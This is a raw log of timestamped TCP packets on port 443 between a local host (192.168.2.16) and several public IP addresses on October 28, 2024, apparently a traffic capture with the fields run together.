                                                                                                                                                Oct 28, 2024 17:47:41.727359056 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:41.727379084 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.727415085 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.727447033 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.727447033 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:41.727459908 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.727489948 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:41.727757931 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.727813005 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:41.727823019 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.777493000 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:41.782860041 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.782922029 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.782970905 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.783005953 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:41.783027887 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.783085108 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:41.783332109 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.783406019 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.783441067 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.783467054 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.783485889 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:41.783494949 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.783524990 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:41.784200907 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.784234047 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.784300089 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:41.784307003 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.784364939 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:41.865649939 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.865737915 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.865775108 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.865819931 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:41.865844011 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.865894079 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:41.866132975 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.866190910 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.866219997 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.866239071 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:41.866247892 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.866286039 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:41.866954088 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.889483929 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                Oct 28, 2024 17:47:41.900262117 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.900476933 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.900533915 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:41.900558949 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.900652885 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.900716066 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:41.900723934 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.900984049 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.901045084 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:41.901051998 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.901170015 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.901272058 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:41.901278019 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.920489073 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:41.920500994 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.952472925 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:41.952498913 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.968871117 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:41.981373072 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.981441021 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.981476068 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.981499910 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:41.981520891 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.981596947 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.981646061 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:41.981654882 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.981689930 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:41.981930971 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.982017040 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.982067108 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:41.982074022 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.982785940 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.982821941 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.982852936 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.982870102 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:41.982877016 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.982897997 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:42.000480890 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:42.017668962 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.017702103 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.017750978 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:42.017853022 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.017904997 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:42.017920017 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.017959118 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:42.017963886 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.018357038 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.018424034 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:42.018435955 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.018477917 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:42.032493114 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:42.058804035 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.058821917 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.058913946 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:42.090687037 CET44349742188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.091036081 CET49742443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:42.091053009 CET44349742188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.091422081 CET44349742188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.091811895 CET49742443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:42.091886044 CET44349742188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.092176914 CET49742443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:42.098253012 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.098387003 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.098416090 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.098442078 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.098450899 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:42.098467112 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.098494053 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:42.098870039 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.098897934 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.098926067 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:42.098934889 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.099003077 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:42.134701967 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.134794950 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:42.134951115 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.135010958 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:42.135323048 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.135390043 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:42.139333010 CET44349742188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.143717051 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.143731117 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.143785000 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:42.176240921 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.176326036 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:42.212220907 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.212307930 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:42.212336063 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.212414026 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.212471008 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:42.212477922 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.212856054 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.212909937 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:42.212918043 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.213032961 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:42.252247095 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.252332926 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:42.252424002 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.252477884 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:42.252545118 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.252602100 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:42.255019903 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.255088091 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:42.259347916 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.259416103 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:42.312228918 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.312355995 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:42.329540014 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.329591990 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.329638004 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:42.329665899 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.329691887 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:42.329708099 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:42.329797983 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.329838991 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:42.329845905 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.329879999 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.329956055 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:42.330106020 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:42.330126047 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.334737062 CET49744443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:42.334772110 CET44349744104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.334845066 CET49744443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:42.335072994 CET49744443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:42.335082054 CET44349744104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.369611025 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.369729996 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:42.369919062 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.369991064 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:42.371701956 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.371788025 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:42.371836901 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.371891022 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:42.371896982 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.371917963 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.371982098 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:42.372056961 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:42.372067928 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.435197115 CET44349742188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.435231924 CET44349742188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.435254097 CET44349742188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.435281992 CET44349742188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.435286045 CET49742443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:42.435303926 CET44349742188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.435339928 CET44349742188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.435350895 CET49742443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:42.435365915 CET44349742188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.435394049 CET49742443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:42.435403109 CET44349742188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.435461998 CET49742443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:42.435467005 CET44349742188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.435576916 CET49742443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:42.440454006 CET49742443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:42.440475941 CET44349742188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.455488920 CET49747443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:42.455591917 CET44349747188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.455682993 CET49747443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:42.456222057 CET49747443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:42.456254005 CET44349747188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.769267082 CET49748443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:42.769310951 CET44349748104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.769576073 CET49748443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:42.770052910 CET49748443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:42.770066977 CET44349748104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.939306974 CET44349744104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.939665079 CET49744443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:42.939692020 CET44349744104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.940063000 CET44349744104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.940531969 CET49744443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:42.940604925 CET44349744104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:42.940715075 CET49744443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:42.987344027 CET44349744104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:43.059421062 CET44349747188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:43.059927940 CET49747443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:43.059966087 CET44349747188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:43.060317993 CET44349747188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:43.060688019 CET49747443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:43.060749054 CET44349747188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:43.060857058 CET49747443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:43.083882093 CET44349744104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:43.083956957 CET44349744104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:43.084024906 CET49744443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:43.084737062 CET49744443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:43.084758997 CET44349744104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:43.103341103 CET44349747188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:43.201936960 CET44349747188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:43.201989889 CET44349747188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:43.202027082 CET44349747188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:43.202060938 CET44349747188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:43.202084064 CET49747443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:43.202122927 CET44349747188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:43.202138901 CET49747443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:43.202378035 CET44349747188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:43.202410936 CET44349747188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:43.202429056 CET49747443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:43.202439070 CET44349747188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:43.202491045 CET49747443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:43.202497005 CET44349747188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:43.202512980 CET44349747188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:43.202567101 CET49747443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:43.203289986 CET49747443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:43.203306913 CET44349747188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:43.302521944 CET49673443192.168.2.16204.79.197.203
                                                                                                                                                Oct 28, 2024 17:47:43.388122082 CET44349748104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:43.388442039 CET49748443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:43.388456106 CET44349748104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:43.388782978 CET44349748104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:43.389190912 CET49748443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:43.389244080 CET44349748104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:43.389337063 CET49748443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:43.435333014 CET44349748104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:43.546930075 CET44349748104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:43.547020912 CET44349748104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:43.547092915 CET49748443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:43.548724890 CET49748443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:43.548743963 CET44349748104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:43.551356077 CET49750443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:43.551399946 CET44349750104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:43.551490068 CET49750443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:43.551752090 CET49750443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:43.551767111 CET44349750104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:43.556427002 CET44349720142.250.185.228192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:43.556497097 CET44349720142.250.185.228192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:43.556747913 CET49720443192.168.2.16142.250.185.228
                                                                                                                                                Oct 28, 2024 17:47:43.669939995 CET49720443192.168.2.16142.250.185.228
                                                                                                                                                Oct 28, 2024 17:47:43.669970036 CET44349720142.250.185.228192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:43.670303106 CET49751443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:43.670336962 CET44349751104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:43.670413971 CET49751443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:43.670630932 CET49751443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:43.670646906 CET44349751104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:44.152188063 CET44349750104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:44.152502060 CET49750443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:44.152524948 CET44349750104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:44.152861118 CET44349750104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:44.153206110 CET49750443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:44.153290987 CET44349750104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:44.153352976 CET49750443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:44.195338964 CET44349750104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:44.273066044 CET44349751104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:44.273899078 CET49751443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:44.273924112 CET44349751104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:44.274279118 CET44349751104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:44.274804115 CET49751443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:44.274868011 CET44349751104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:44.275161028 CET49751443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:44.293137074 CET44349750104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:44.293211937 CET44349750104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:44.294369936 CET49750443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:44.294370890 CET49750443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:44.315340042 CET44349751104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:44.416577101 CET44349751104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:44.416656017 CET44349751104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:44.416723967 CET44349751104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:44.416830063 CET49751443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:44.417388916 CET49751443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:44.417407036 CET44349751104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:44.560122967 CET49752443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:44.560173988 CET44349752104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:44.560343981 CET49752443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:44.560544014 CET49752443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:44.560554028 CET44349752104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:44.609602928 CET49750443192.168.2.16104.18.95.41
